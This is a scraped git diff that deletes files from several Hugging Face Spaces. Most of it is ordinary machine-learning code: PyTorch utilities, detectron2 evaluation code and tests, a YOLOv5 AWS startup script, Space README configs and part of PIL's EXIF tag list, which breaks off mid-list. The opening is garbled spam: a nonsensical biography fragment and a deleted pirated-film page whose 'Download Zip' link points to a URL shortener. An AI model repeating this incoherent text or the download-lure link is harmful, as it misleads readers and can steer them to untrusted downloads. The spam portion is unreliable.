researchers, many questions were addressed to me by them. The interview was recorded in a series of about ten hours and published later on the IBT Media website. All the content is made public in their original form. 
Marius Ghenea has done his military service in the Italian army. Then he moved to Italy where he started his business career in carte antreprenoriat. - -I am a computer engineer, a teacher and a writer. I read 4fefd39f24
    -
    -
    -

    diff --git a/spaces/bioriAsaeru/text-to-voice/Halaat Hindi 720p Free Download [REPACK].md b/spaces/bioriAsaeru/text-to-voice/Halaat Hindi 720p Free Download [REPACK].md deleted file mode 100644 index 5f3c14ea39490478a86baa334693483bd99d7303..0000000000000000000000000000000000000000 --- a/spaces/bioriAsaeru/text-to-voice/Halaat Hindi 720p Free Download [REPACK].md +++ /dev/null @@ -1,6 +0,0 @@ -

    Halaat Hindi 720p Free Download


    Download Zip ––– https://urloso.com/2uyR56



    -
    - aaccfb2cb3
    -
    -
    -

    diff --git a/spaces/birsardar/stable-diffusion-mat-outpainting-primer/torch_utils/misc.py b/spaces/birsardar/stable-diffusion-mat-outpainting-primer/torch_utils/misc.py deleted file mode 100644 index d447829a091d94e56b2984e801de74b4c9ec5d19..0000000000000000000000000000000000000000 --- a/spaces/birsardar/stable-diffusion-mat-outpainting-primer/torch_utils/misc.py +++ /dev/null @@ -1,268 +0,0 @@ -# Copyright (c) 2021, NVIDIA CORPORATION. All rights reserved. -# -# NVIDIA CORPORATION and its licensors retain all intellectual property -# and proprietary rights in and to this software, related documentation -# and any modifications thereto. Any use, reproduction, disclosure or -# distribution of this software and related documentation without an express -# license agreement from NVIDIA CORPORATION is strictly prohibited. - -import re -import contextlib -import numpy as np -import torch -import warnings -import dnnlib - -#---------------------------------------------------------------------------- -# Cached construction of constant tensors. Avoids CPU=>GPU copy when the -# same constant is used multiple times. 
- -_constant_cache = dict() - -def constant(value, shape=None, dtype=None, device=None, memory_format=None): - value = np.asarray(value) - if shape is not None: - shape = tuple(shape) - if dtype is None: - dtype = torch.get_default_dtype() - if device is None: - device = torch.device('cpu') - if memory_format is None: - memory_format = torch.contiguous_format - - key = (value.shape, value.dtype, value.tobytes(), shape, dtype, device, memory_format) - tensor = _constant_cache.get(key, None) - if tensor is None: - tensor = torch.as_tensor(value.copy(), dtype=dtype, device=device) - if shape is not None: - tensor, _ = torch.broadcast_tensors(tensor, torch.empty(shape)) - tensor = tensor.contiguous(memory_format=memory_format) - _constant_cache[key] = tensor - return tensor - -#---------------------------------------------------------------------------- -# Replace NaN/Inf with specified numerical values. - -try: - nan_to_num = torch.nan_to_num # 1.8.0a0 -except AttributeError: - def nan_to_num(input, nan=0.0, posinf=None, neginf=None, *, out=None): # pylint: disable=redefined-builtin - assert isinstance(input, torch.Tensor) - if posinf is None: - posinf = torch.finfo(input.dtype).max - if neginf is None: - neginf = torch.finfo(input.dtype).min - assert nan == 0 - return torch.clamp(input.unsqueeze(0).nansum(0), min=neginf, max=posinf, out=out) - -#---------------------------------------------------------------------------- -# Symbolic assert. - -try: - symbolic_assert = torch._assert # 1.8.0a0 # pylint: disable=protected-access -except AttributeError: - symbolic_assert = torch.Assert # 1.7.0 - -#---------------------------------------------------------------------------- -# Context manager to suppress known warnings in torch.jit.trace(). 
- -class suppress_tracer_warnings(warnings.catch_warnings): - def __enter__(self): - super().__enter__() - warnings.simplefilter('ignore', category=torch.jit.TracerWarning) - return self - -#---------------------------------------------------------------------------- -# Assert that the shape of a tensor matches the given list of integers. -# None indicates that the size of a dimension is allowed to vary. -# Performs symbolic assertion when used in torch.jit.trace(). - -def assert_shape(tensor, ref_shape): - if tensor.ndim != len(ref_shape): - raise AssertionError(f'Wrong number of dimensions: got {tensor.ndim}, expected {len(ref_shape)}') - for idx, (size, ref_size) in enumerate(zip(tensor.shape, ref_shape)): - if ref_size is None: - pass - elif isinstance(ref_size, torch.Tensor): - with suppress_tracer_warnings(): # as_tensor results are registered as constants - symbolic_assert(torch.equal(torch.as_tensor(size), ref_size), f'Wrong size for dimension {idx}') - elif isinstance(size, torch.Tensor): - with suppress_tracer_warnings(): # as_tensor results are registered as constants - symbolic_assert(torch.equal(size, torch.as_tensor(ref_size)), f'Wrong size for dimension {idx}: expected {ref_size}') - elif size != ref_size: - raise AssertionError(f'Wrong size for dimension {idx}: got {size}, expected {ref_size}') - -#---------------------------------------------------------------------------- -# Function decorator that calls torch.autograd.profiler.record_function(). - -def profiled_function(fn): - def decorator(*args, **kwargs): - with torch.autograd.profiler.record_function(fn.__name__): - return fn(*args, **kwargs) - decorator.__name__ = fn.__name__ - return decorator - -#---------------------------------------------------------------------------- -# Sampler for torch.utils.data.DataLoader that loops over the dataset -# indefinitely, shuffling items as it goes. 
- -class InfiniteSampler(torch.utils.data.Sampler): - def __init__(self, dataset, rank=0, num_replicas=1, shuffle=True, seed=0, window_size=0.5): - assert len(dataset) > 0 - assert num_replicas > 0 - assert 0 <= rank < num_replicas - assert 0 <= window_size <= 1 - super().__init__(dataset) - self.dataset = dataset - self.rank = rank - self.num_replicas = num_replicas - self.shuffle = shuffle - self.seed = seed - self.window_size = window_size - - def __iter__(self): - order = np.arange(len(self.dataset)) - rnd = None - window = 0 - if self.shuffle: - rnd = np.random.RandomState(self.seed) - rnd.shuffle(order) - window = int(np.rint(order.size * self.window_size)) - - idx = 0 - while True: - i = idx % order.size - if idx % self.num_replicas == self.rank: - yield order[i] - if window >= 2: - j = (i - rnd.randint(window)) % order.size - order[i], order[j] = order[j], order[i] - idx += 1 - -#---------------------------------------------------------------------------- -# Utilities for operating with torch.nn.Module parameters and buffers. 
- -def params_and_buffers(module): - assert isinstance(module, torch.nn.Module) - return list(module.parameters()) + list(module.buffers()) - -def named_params_and_buffers(module): - assert isinstance(module, torch.nn.Module) - return list(module.named_parameters()) + list(module.named_buffers()) - -def copy_params_and_buffers(src_module, dst_module, require_all=False): - assert isinstance(src_module, torch.nn.Module) - assert isinstance(dst_module, torch.nn.Module) - src_tensors = {name: tensor for name, tensor in named_params_and_buffers(src_module)} - for name, tensor in named_params_and_buffers(dst_module): - assert (name in src_tensors) or (not require_all) - if name in src_tensors: - tensor.copy_(src_tensors[name].detach()).requires_grad_(tensor.requires_grad) - -#---------------------------------------------------------------------------- -# Context manager for easily enabling/disabling DistributedDataParallel -# synchronization. - -@contextlib.contextmanager -def ddp_sync(module, sync): - assert isinstance(module, torch.nn.Module) - if sync or not isinstance(module, torch.nn.parallel.DistributedDataParallel): - yield - else: - with module.no_sync(): - yield - -#---------------------------------------------------------------------------- -# Check DistributedDataParallel consistency across processes. - -def check_ddp_consistency(module, ignore_regex=None): - assert isinstance(module, torch.nn.Module) - for name, tensor in named_params_and_buffers(module): - fullname = type(module).__name__ + '.' + name - flag = False - if ignore_regex is not None: - for regex in ignore_regex: - if re.fullmatch(regex, fullname): - flag = True - break - if flag: - continue - tensor = tensor.detach() - other = tensor.clone() - torch.distributed.broadcast(tensor=other, src=0) - assert (nan_to_num(tensor) == nan_to_num(other)).all(), fullname - -#---------------------------------------------------------------------------- -# Print summary table of module hierarchy. 
- -def print_module_summary(module, inputs, max_nesting=3, skip_redundant=True): - assert isinstance(module, torch.nn.Module) - assert not isinstance(module, torch.jit.ScriptModule) - assert isinstance(inputs, (tuple, list)) - - # Register hooks. - entries = [] - nesting = [0] - def pre_hook(_mod, _inputs): - nesting[0] += 1 - def post_hook(mod, _inputs, outputs): - nesting[0] -= 1 - if nesting[0] <= max_nesting: - outputs = list(outputs) if isinstance(outputs, (tuple, list)) else [outputs] - outputs = [t for t in outputs if isinstance(t, torch.Tensor)] - entries.append(dnnlib.EasyDict(mod=mod, outputs=outputs)) - hooks = [mod.register_forward_pre_hook(pre_hook) for mod in module.modules()] - hooks += [mod.register_forward_hook(post_hook) for mod in module.modules()] - - # Run module. - outputs = module(*inputs) - for hook in hooks: - hook.remove() - - # Identify unique outputs, parameters, and buffers. - tensors_seen = set() - for e in entries: - e.unique_params = [t for t in e.mod.parameters() if id(t) not in tensors_seen] - e.unique_buffers = [t for t in e.mod.buffers() if id(t) not in tensors_seen] - e.unique_outputs = [t for t in e.outputs if id(t) not in tensors_seen] - tensors_seen |= {id(t) for t in e.unique_params + e.unique_buffers + e.unique_outputs} - - # Filter out redundant entries. - if skip_redundant: - entries = [e for e in entries if len(e.unique_params) or len(e.unique_buffers) or len(e.unique_outputs)] - - # Construct table. 
- rows = [[type(module).__name__, 'Parameters', 'Buffers', 'Output shape', 'Datatype']] - rows += [['---'] * len(rows[0])] - param_total = 0 - buffer_total = 0 - submodule_names = {mod: name for name, mod in module.named_modules()} - for e in entries: - name = '' if e.mod is module else submodule_names[e.mod] - param_size = sum(t.numel() for t in e.unique_params) - buffer_size = sum(t.numel() for t in e.unique_buffers) - output_shapes = [str(list(t.shape)) for t in e.outputs] - output_dtypes = [str(t.dtype).split('.')[-1] for t in e.outputs] - rows += [[ - name + (':0' if len(e.outputs) >= 2 else ''), - str(param_size) if param_size else '-', - str(buffer_size) if buffer_size else '-', - (output_shapes + ['-'])[0], - (output_dtypes + ['-'])[0], - ]] - for idx in range(1, len(e.outputs)): - rows += [[name + f':{idx}', '-', '-', output_shapes[idx], output_dtypes[idx]]] - param_total += param_size - buffer_total += buffer_size - rows += [['---'] * len(rows[0])] - rows += [['Total', str(param_total), str(buffer_total), '-', '-']] - - # Print table. 
- widths = [max(len(cell) for cell in column) for column in zip(*rows)] - print() - for row in rows: - print(' '.join(cell + ' ' * (width - len(cell)) for cell, width in zip(row, widths))) - print() - return outputs - -#---------------------------------------------------------------------------- diff --git a/spaces/breadlicker45/the-jam-machine-app/load.py b/spaces/breadlicker45/the-jam-machine-app/load.py deleted file mode 100644 index bacdf11654a512ff191903dadfc31ca257467929..0000000000000000000000000000000000000000 --- a/spaces/breadlicker45/the-jam-machine-app/load.py +++ /dev/null @@ -1,63 +0,0 @@ -from transformers import GPT2LMHeadModel -from transformers import PreTrainedTokenizerFast -import os -import torch - - -class LoadModel: - """ - Example usage: - - # if loading model and tokenizer from Huggingface - model_repo = "misnaej/the-jam-machine-wdtef6l" - model, tokenizer = LoadModel( - model_repo, from_huggingface=True - ).load_model_and_tokenizer() - - # if loading model and tokenizer from a local folder - model_path = "models/model_2048_wholedataset" - model, tokenizer = LoadModel( - model_path, from_huggingface=False - ).load_model_and_tokenizer() - - """ - - def __init__(self, path, from_huggingface=True, device="cpu", revision=None): - # path is either a relative path on a local/remote machine or a model repo on HuggingFace - if not from_huggingface: - if not os.path.exists(path): - print(path) - raise Exception("Model path does not exist") - self.from_huggingface = from_huggingface - self.path = path - self.device = device - self.revision = revision - if torch.cuda.is_available(): - self.device = "cuda" - - def load_model_and_tokenizer(self): - model = self.load_model() - tokenizer = self.load_tokenizer() - - return model, tokenizer - - def load_model(self): - if self.revision is None: - model = GPT2LMHeadModel.from_pretrained(self.path) # .to(self.device) - else: - model = GPT2LMHeadModel.from_pretrained( - self.path, revision=self.revision - ) # 
.to(self.device) - - return model - - def load_tokenizer(self): - if self.from_huggingface: - pass - else: - if not os.path.exists(f"{self.path}/tokenizer.json"): - raise Exception( - f"There is no 'tokenizer.json' file in the defined {self.path}" - ) - tokenizer = PreTrainedTokenizerFast.from_pretrained(self.path) - return tokenizer diff --git a/spaces/brjathu/HMR2.0/vendor/detectron2/detectron2/evaluation/testing.py b/spaces/brjathu/HMR2.0/vendor/detectron2/detectron2/evaluation/testing.py deleted file mode 100644 index 9e5ae625bb0593fc20739dd3ea549157e4df4f3d..0000000000000000000000000000000000000000 --- a/spaces/brjathu/HMR2.0/vendor/detectron2/detectron2/evaluation/testing.py +++ /dev/null @@ -1,85 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -import logging -import numpy as np -import pprint -import sys -from collections.abc import Mapping - - -def print_csv_format(results): - """ - Print main metrics in a format similar to Detectron, - so that they are easy to copypaste into a spreadsheet. - - Args: - results (OrderedDict[dict]): task_name -> {metric -> score} - unordered dict can also be printed, but in arbitrary order - """ - assert isinstance(results, Mapping) or not len(results), results - logger = logging.getLogger(__name__) - for task, res in results.items(): - if isinstance(res, Mapping): - # Don't print "AP-category" metrics since they are usually not tracked. 
- important_res = [(k, v) for k, v in res.items() if "-" not in k] - logger.info("copypaste: Task: {}".format(task)) - logger.info("copypaste: " + ",".join([k[0] for k in important_res])) - logger.info("copypaste: " + ",".join(["{0:.4f}".format(k[1]) for k in important_res])) - else: - logger.info(f"copypaste: {task}={res}") - - -def verify_results(cfg, results): - """ - Args: - results (OrderedDict[dict]): task_name -> {metric -> score} - - Returns: - bool: whether the verification succeeds or not - """ - expected_results = cfg.TEST.EXPECTED_RESULTS - if not len(expected_results): - return True - - ok = True - for task, metric, expected, tolerance in expected_results: - actual = results[task].get(metric, None) - if actual is None: - ok = False - continue - if not np.isfinite(actual): - ok = False - continue - diff = abs(actual - expected) - if diff > tolerance: - ok = False - - logger = logging.getLogger(__name__) - if not ok: - logger.error("Result verification failed!") - logger.error("Expected Results: " + str(expected_results)) - logger.error("Actual Results: " + pprint.pformat(results)) - - sys.exit(1) - else: - logger.info("Results verification passed.") - return ok - - -def flatten_results_dict(results): - """ - Expand a hierarchical dict of scalars into a flat dict of scalars. - If results[k1][k2][k3] = v, the returned dict will have the entry - {"k1/k2/k3": v}. 
- - Args: - results (dict): - """ - r = {} - for k, v in results.items(): - if isinstance(v, Mapping): - v = flatten_results_dict(v) - for kk, vv in v.items(): - r[k + "/" + kk] = vv - else: - r[k] = v - return r diff --git a/spaces/brjathu/HMR2.0/vendor/detectron2/tests/structures/test_instances.py b/spaces/brjathu/HMR2.0/vendor/detectron2/tests/structures/test_instances.py deleted file mode 100644 index a352f74313ae9b2b7a42398f0ef4606fcb4a610c..0000000000000000000000000000000000000000 --- a/spaces/brjathu/HMR2.0/vendor/detectron2/tests/structures/test_instances.py +++ /dev/null @@ -1,219 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -import unittest -import torch -from torch import Tensor - -from detectron2.export.torchscript import patch_instances -from detectron2.structures import Boxes, Instances -from detectron2.utils.testing import convert_scripted_instances - - -class TestInstances(unittest.TestCase): - def test_int_indexing(self): - attr1 = torch.tensor([[0.0, 0.0, 1.0], [0.0, 0.0, 0.5], [0.0, 0.0, 1.0], [0.0, 0.5, 0.5]]) - attr2 = torch.tensor([0.1, 0.2, 0.3, 0.4]) - instances = Instances((100, 100)) - instances.attr1 = attr1 - instances.attr2 = attr2 - for i in range(-len(instances), len(instances)): - inst = instances[i] - self.assertEqual((inst.attr1 == attr1[i]).all(), True) - self.assertEqual((inst.attr2 == attr2[i]).all(), True) - - self.assertRaises(IndexError, lambda: instances[len(instances)]) - self.assertRaises(IndexError, lambda: instances[-len(instances) - 1]) - - def test_script_new_fields(self): - def get_mask(x: Instances) -> torch.Tensor: - return x.mask - - class f(torch.nn.Module): - def forward(self, x: Instances): - proposal_boxes = x.proposal_boxes # noqa F841 - objectness_logits = x.objectness_logits # noqa F841 - return x - - class g(torch.nn.Module): - def forward(self, x: Instances): - return get_mask(x) - - class g2(torch.nn.Module): - def __init__(self): - super().__init__() - self.g = g() - - def forward(self, x: 
Instances): - proposal_boxes = x.proposal_boxes # noqa F841 - return x, self.g(x) - - fields = {"proposal_boxes": Boxes, "objectness_logits": Tensor} - with patch_instances(fields): - torch.jit.script(f()) - - # can't script anymore after exiting the context - with self.assertRaises(Exception): - # will create a ConcreteType for g - torch.jit.script(g2()) - - new_fields = {"mask": Tensor} - with patch_instances(new_fields): - # will compile g with a different Instances; this should pass - torch.jit.script(g()) - with self.assertRaises(Exception): - torch.jit.script(g2()) - - new_fields = {"mask": Tensor, "proposal_boxes": Boxes} - with patch_instances(new_fields) as NewInstances: - # get_mask will be compiled with a different Instances; this should pass - scripted_g2 = torch.jit.script(g2()) - x = NewInstances((3, 4)) - x.mask = torch.rand(3) - x.proposal_boxes = Boxes(torch.rand(3, 4)) - scripted_g2(x) # it should accept the new Instances object and run successfully - - def test_script_access_fields(self): - class f(torch.nn.Module): - def forward(self, x: Instances): - proposal_boxes = x.proposal_boxes - objectness_logits = x.objectness_logits - return proposal_boxes.tensor + objectness_logits - - fields = {"proposal_boxes": Boxes, "objectness_logits": Tensor} - with patch_instances(fields): - torch.jit.script(f()) - - def test_script_len(self): - class f(torch.nn.Module): - def forward(self, x: Instances): - return len(x) - - class g(torch.nn.Module): - def forward(self, x: Instances): - return len(x) - - image_shape = (15, 15) - - fields = {"proposal_boxes": Boxes} - with patch_instances(fields) as new_instance: - script_module = torch.jit.script(f()) - x = new_instance(image_shape) - with self.assertRaises(Exception): - script_module(x) - box_tensors = torch.tensor([[5, 5, 10, 10], [1, 1, 2, 3]]) - x.proposal_boxes = Boxes(box_tensors) - length = script_module(x) - self.assertEqual(length, 2) - - fields = {"objectness_logits": Tensor} - with 
patch_instances(fields) as new_instance: - script_module = torch.jit.script(g()) - x = new_instance(image_shape) - objectness_logits = torch.tensor([1.0]).reshape(1, 1) - x.objectness_logits = objectness_logits - length = script_module(x) - self.assertEqual(length, 1) - - def test_script_has(self): - class f(torch.nn.Module): - def forward(self, x: Instances): - return x.has("proposal_boxes") - - image_shape = (15, 15) - fields = {"proposal_boxes": Boxes} - with patch_instances(fields) as new_instance: - script_module = torch.jit.script(f()) - x = new_instance(image_shape) - self.assertFalse(script_module(x)) - - box_tensors = torch.tensor([[5, 5, 10, 10], [1, 1, 2, 3]]) - x.proposal_boxes = Boxes(box_tensors) - self.assertTrue(script_module(x)) - - def test_script_to(self): - class f(torch.nn.Module): - def forward(self, x: Instances): - return x.to(torch.device("cpu")) - - image_shape = (15, 15) - fields = {"proposal_boxes": Boxes, "a": Tensor} - with patch_instances(fields) as new_instance: - script_module = torch.jit.script(f()) - x = new_instance(image_shape) - script_module(x) - - box_tensors = torch.tensor([[5, 5, 10, 10], [1, 1, 2, 3]]) - x.proposal_boxes = Boxes(box_tensors) - x.a = box_tensors - script_module(x) - - def test_script_getitem(self): - class f(torch.nn.Module): - def forward(self, x: Instances, idx): - return x[idx] - - image_shape = (15, 15) - fields = {"proposal_boxes": Boxes, "a": Tensor} - inst = Instances(image_shape) - inst.proposal_boxes = Boxes(torch.rand(4, 4)) - inst.a = torch.rand(4, 10) - idx = torch.tensor([True, False, True, False]) - with patch_instances(fields) as new_instance: - script_module = torch.jit.script(f()) - - out = f()(inst, idx) - out_scripted = script_module(new_instance.from_instances(inst), idx) - self.assertTrue( - torch.equal(out.proposal_boxes.tensor, out_scripted.proposal_boxes.tensor) - ) - self.assertTrue(torch.equal(out.a, out_scripted.a)) - - def test_from_to_instances(self): - orig = Instances((30, 
30)) - orig.proposal_boxes = Boxes(torch.rand(3, 4)) - - fields = {"proposal_boxes": Boxes, "a": Tensor} - with patch_instances(fields) as NewInstances: - # convert to NewInstances and back - new1 = NewInstances.from_instances(orig) - new2 = convert_scripted_instances(new1) - self.assertTrue(torch.equal(orig.proposal_boxes.tensor, new1.proposal_boxes.tensor)) - self.assertTrue(torch.equal(orig.proposal_boxes.tensor, new2.proposal_boxes.tensor)) - - def test_script_init_args(self): - def f(x: Tensor): - image_shape = (15, 15) - # __init__ can take arguments - inst = Instances(image_shape, a=x, proposal_boxes=Boxes(x)) - inst2 = Instances(image_shape, a=x) - return inst.a, inst2.a - - fields = {"proposal_boxes": Boxes, "a": Tensor} - with patch_instances(fields): - script_f = torch.jit.script(f) - x = torch.randn(3, 4) - outputs = script_f(x) - self.assertTrue(torch.equal(outputs[0], x)) - self.assertTrue(torch.equal(outputs[1], x)) - - def test_script_cat(self): - def f(x: Tensor): - image_shape = (15, 15) - # __init__ can take arguments - inst = Instances(image_shape, a=x) - inst2 = Instances(image_shape, a=x) - - inst3 = Instances(image_shape, proposal_boxes=Boxes(x)) - return inst.cat([inst, inst2]), inst3.cat([inst3, inst3]) - - fields = {"proposal_boxes": Boxes, "a": Tensor} - with patch_instances(fields): - script_f = torch.jit.script(f) - x = torch.randn(3, 4) - output, output2 = script_f(x) - self.assertTrue(torch.equal(output.a, torch.cat([x, x]))) - self.assertFalse(output.has("proposal_boxes")) - self.assertTrue(torch.equal(output2.proposal_boxes.tensor, torch.cat([x, x]))) - - -if __name__ == "__main__": - unittest.main() diff --git a/spaces/bulentsofttech/gradio_s1000_veri_toplama_modeli/yolov5/utils/aws/userdata.sh b/spaces/bulentsofttech/gradio_s1000_veri_toplama_modeli/yolov5/utils/aws/userdata.sh deleted file mode 100644 index 5fc1332ac1b0d1794cf8f8c5f6918059ae5dc381..0000000000000000000000000000000000000000 --- 
a/spaces/bulentsofttech/gradio_s1000_veri_toplama_modeli/yolov5/utils/aws/userdata.sh +++ /dev/null @@ -1,27 +0,0 @@ -#!/bin/bash -# AWS EC2 instance startup script https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/user-data.html -# This script will run only once on first instance start (for a re-start script see mime.sh) -# /home/ubuntu (ubuntu) or /home/ec2-user (amazon-linux) is working dir -# Use >300 GB SSD - -cd home/ubuntu -if [ ! -d yolov5 ]; then - echo "Running first-time script." # install dependencies, download COCO, pull Docker - git clone https://github.com/ultralytics/yolov5 -b master && sudo chmod -R 777 yolov5 - cd yolov5 - bash data/scripts/get_coco.sh && echo "COCO done." & - sudo docker pull ultralytics/yolov5:latest && echo "Docker done." & - python -m pip install --upgrade pip && pip install -r requirements.txt && python detect.py && echo "Requirements done." & - wait && echo "All tasks done." # finish background tasks -else - echo "Running re-start script." # resume interrupted runs - i=0 - list=$(sudo docker ps -qa) # container list i.e. 
$'one\ntwo\nthree\nfour' - while IFS= read -r id; do - ((i++)) - echo "restarting container $i: $id" - sudo docker start $id - # sudo docker exec -it $id python train.py --resume # single-GPU - sudo docker exec -d $id python utils/aws/resume.py # multi-scenario - done <<<"$list" -fi diff --git a/spaces/bunnyg20081061/world2/README.md b/spaces/bunnyg20081061/world2/README.md deleted file mode 100644 index ed67cd9d26b168ca63c3e2b957e7a56024c12ccb..0000000000000000000000000000000000000000 --- a/spaces/bunnyg20081061/world2/README.md +++ /dev/null @@ -1,12 +0,0 @@ ---- -title: World2 -emoji: 📉 -colorFrom: red -colorTo: indigo -sdk: gradio -sdk_version: 3.12.0 -app_file: app.py -pinned: false ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/carlosalonso/Detection-video/carpeta_deteccion/detectron2/utils/tracing.py b/spaces/carlosalonso/Detection-video/carpeta_deteccion/detectron2/utils/tracing.py deleted file mode 100644 index 577df4e2f4ad0a1a309d31d7c28311be11f87247..0000000000000000000000000000000000000000 --- a/spaces/carlosalonso/Detection-video/carpeta_deteccion/detectron2/utils/tracing.py +++ /dev/null @@ -1,71 +0,0 @@ -import inspect -import torch - -from detectron2.utils.env import TORCH_VERSION - -try: - from torch.fx._symbolic_trace import is_fx_tracing as is_fx_tracing_current - - tracing_current_exists = True -except ImportError: - tracing_current_exists = False - -try: - from torch.fx._symbolic_trace import _orig_module_call - - tracing_legacy_exists = True -except ImportError: - tracing_legacy_exists = False - - -@torch.jit.ignore -def is_fx_tracing_legacy() -> bool: - """ - Returns a bool indicating whether torch.fx is currently symbolically tracing a module. - Can be useful for gating module logic that is incompatible with symbolic tracing. 
- """ - return torch.nn.Module.__call__ is not _orig_module_call - - -@torch.jit.ignore -def is_fx_tracing() -> bool: - """Returns whether execution is currently in - Torch FX tracing mode""" - if TORCH_VERSION >= (1, 10) and tracing_current_exists: - return is_fx_tracing_current() - elif tracing_legacy_exists: - return is_fx_tracing_legacy() - else: - # Can't find either current or legacy tracing indication code. - # Enabling this assert_fx_safe() call regardless of tracing status. - return False - - -@torch.jit.ignore -def assert_fx_safe(condition: bool, message: str) -> torch.Tensor: - """An FX-tracing safe version of assert. - Avoids erroneous type assertion triggering when types are masked inside - an fx.proxy.Proxy object during tracing. - Args: condition - either a boolean expression or a string representing - the condition to test. If this assert triggers an exception when tracing - due to dynamic control flow, try encasing the expression in quotation - marks and supplying it as a string.""" - # Must return a concrete tensor for compatibility with PyTorch <=1.8. - # If <=1.8 compatibility is not needed, return type can be converted to None - if not is_fx_tracing(): - try: - if isinstance(condition, str): - caller_frame = inspect.currentframe().f_back - torch._assert( - eval(condition, caller_frame.f_globals, caller_frame.f_locals), message - ) - return torch.ones(1) - else: - torch._assert(condition, message) - return torch.ones(1) - except torch.fx.proxy.TraceError as e: - print( - "Found a non-FX compatible assertion. Skipping the check. 
Failure is shown below" - + str(e) - ) - return torch.zeros(1) diff --git a/spaces/chinhon/News_Summarizer/README.md b/spaces/chinhon/News_Summarizer/README.md deleted file mode 100644 index f9fc62087ed2ddb151fc18ee2154afd69a7c6af8..0000000000000000000000000000000000000000 --- a/spaces/chinhon/News_Summarizer/README.md +++ /dev/null @@ -1,37 +0,0 @@ ---- -title: News_Summarizer -emoji: 🐨 -colorFrom: indigo -colorTo: gray -sdk: gradio -app_file: app.py -pinned: false ---- - -# Configuration - -`title`: _string_ -Display title for the Space - -`emoji`: _string_ -Space emoji (emoji-only character allowed) - -`colorFrom`: _string_ -Color for Thumbnail gradient (red, yellow, green, blue, indigo, purple, pink, gray) - -`colorTo`: _string_ -Color for Thumbnail gradient (red, yellow, green, blue, indigo, purple, pink, gray) - -`sdk`: _string_ -Can be either `gradio` or `streamlit` - -`sdk_version` : _string_ -Only applicable for `streamlit` SDK. -See [doc](https://hf.co/docs/hub/spaces) for more info on supported versions. - -`app_file`: _string_ -Path to your main application file (which contains either `gradio` or `streamlit` Python code). -Path is relative to the root of the repository. - -`pinned`: _boolean_ -Whether the Space stays on top of your list. diff --git a/spaces/chuan-hd/law-assistant-chatbot/.venv/lib/python3.11/site-packages/PIL/ExifTags.py b/spaces/chuan-hd/law-assistant-chatbot/.venv/lib/python3.11/site-packages/PIL/ExifTags.py deleted file mode 100644 index 2347c6d4c2768b6c946a386bba9f1325ed91193f..0000000000000000000000000000000000000000 --- a/spaces/chuan-hd/law-assistant-chatbot/.venv/lib/python3.11/site-packages/PIL/ExifTags.py +++ /dev/null @@ -1,380 +0,0 @@ -# -# The Python Imaging Library. -# $Id$ -# -# EXIF tags -# -# Copyright (c) 2003 by Secret Labs AB -# -# See the README file for information on usage and redistribution. -# - -""" -This module provides constants and clear-text names for various -well-known EXIF tags. 
-""" - -from enum import IntEnum - - -class Base(IntEnum): - # possibly incomplete - InteropIndex = 0x0001 - ProcessingSoftware = 0x000B - NewSubfileType = 0x00FE - SubfileType = 0x00FF - ImageWidth = 0x0100 - ImageLength = 0x0101 - BitsPerSample = 0x0102 - Compression = 0x0103 - PhotometricInterpretation = 0x0106 - Thresholding = 0x0107 - CellWidth = 0x0108 - CellLength = 0x0109 - FillOrder = 0x010A - DocumentName = 0x010D - ImageDescription = 0x010E - Make = 0x010F - Model = 0x0110 - StripOffsets = 0x0111 - Orientation = 0x0112 - SamplesPerPixel = 0x0115 - RowsPerStrip = 0x0116 - StripByteCounts = 0x0117 - MinSampleValue = 0x0118 - MaxSampleValue = 0x0119 - XResolution = 0x011A - YResolution = 0x011B - PlanarConfiguration = 0x011C - PageName = 0x011D - FreeOffsets = 0x0120 - FreeByteCounts = 0x0121 - GrayResponseUnit = 0x0122 - GrayResponseCurve = 0x0123 - T4Options = 0x0124 - T6Options = 0x0125 - ResolutionUnit = 0x0128 - PageNumber = 0x0129 - TransferFunction = 0x012D - Software = 0x0131 - DateTime = 0x0132 - Artist = 0x013B - HostComputer = 0x013C - Predictor = 0x013D - WhitePoint = 0x013E - PrimaryChromaticities = 0x013F - ColorMap = 0x0140 - HalftoneHints = 0x0141 - TileWidth = 0x0142 - TileLength = 0x0143 - TileOffsets = 0x0144 - TileByteCounts = 0x0145 - SubIFDs = 0x014A - InkSet = 0x014C - InkNames = 0x014D - NumberOfInks = 0x014E - DotRange = 0x0150 - TargetPrinter = 0x0151 - ExtraSamples = 0x0152 - SampleFormat = 0x0153 - SMinSampleValue = 0x0154 - SMaxSampleValue = 0x0155 - TransferRange = 0x0156 - ClipPath = 0x0157 - XClipPathUnits = 0x0158 - YClipPathUnits = 0x0159 - Indexed = 0x015A - JPEGTables = 0x015B - OPIProxy = 0x015F - JPEGProc = 0x0200 - JpegIFOffset = 0x0201 - JpegIFByteCount = 0x0202 - JpegRestartInterval = 0x0203 - JpegLosslessPredictors = 0x0205 - JpegPointTransforms = 0x0206 - JpegQTables = 0x0207 - JpegDCTables = 0x0208 - JpegACTables = 0x0209 - YCbCrCoefficients = 0x0211 - YCbCrSubSampling = 0x0212 - YCbCrPositioning = 0x0213 - 
ReferenceBlackWhite = 0x0214 - XMLPacket = 0x02BC - RelatedImageFileFormat = 0x1000 - RelatedImageWidth = 0x1001 - RelatedImageLength = 0x1002 - Rating = 0x4746 - RatingPercent = 0x4749 - ImageID = 0x800D - CFARepeatPatternDim = 0x828D - BatteryLevel = 0x828F - Copyright = 0x8298 - ExposureTime = 0x829A - FNumber = 0x829D - IPTCNAA = 0x83BB - ImageResources = 0x8649 - ExifOffset = 0x8769 - InterColorProfile = 0x8773 - ExposureProgram = 0x8822 - SpectralSensitivity = 0x8824 - GPSInfo = 0x8825 - ISOSpeedRatings = 0x8827 - OECF = 0x8828 - Interlace = 0x8829 - TimeZoneOffset = 0x882A - SelfTimerMode = 0x882B - SensitivityType = 0x8830 - StandardOutputSensitivity = 0x8831 - RecommendedExposureIndex = 0x8832 - ISOSpeed = 0x8833 - ISOSpeedLatitudeyyy = 0x8834 - ISOSpeedLatitudezzz = 0x8835 - ExifVersion = 0x9000 - DateTimeOriginal = 0x9003 - DateTimeDigitized = 0x9004 - OffsetTime = 0x9010 - OffsetTimeOriginal = 0x9011 - OffsetTimeDigitized = 0x9012 - ComponentsConfiguration = 0x9101 - CompressedBitsPerPixel = 0x9102 - ShutterSpeedValue = 0x9201 - ApertureValue = 0x9202 - BrightnessValue = 0x9203 - ExposureBiasValue = 0x9204 - MaxApertureValue = 0x9205 - 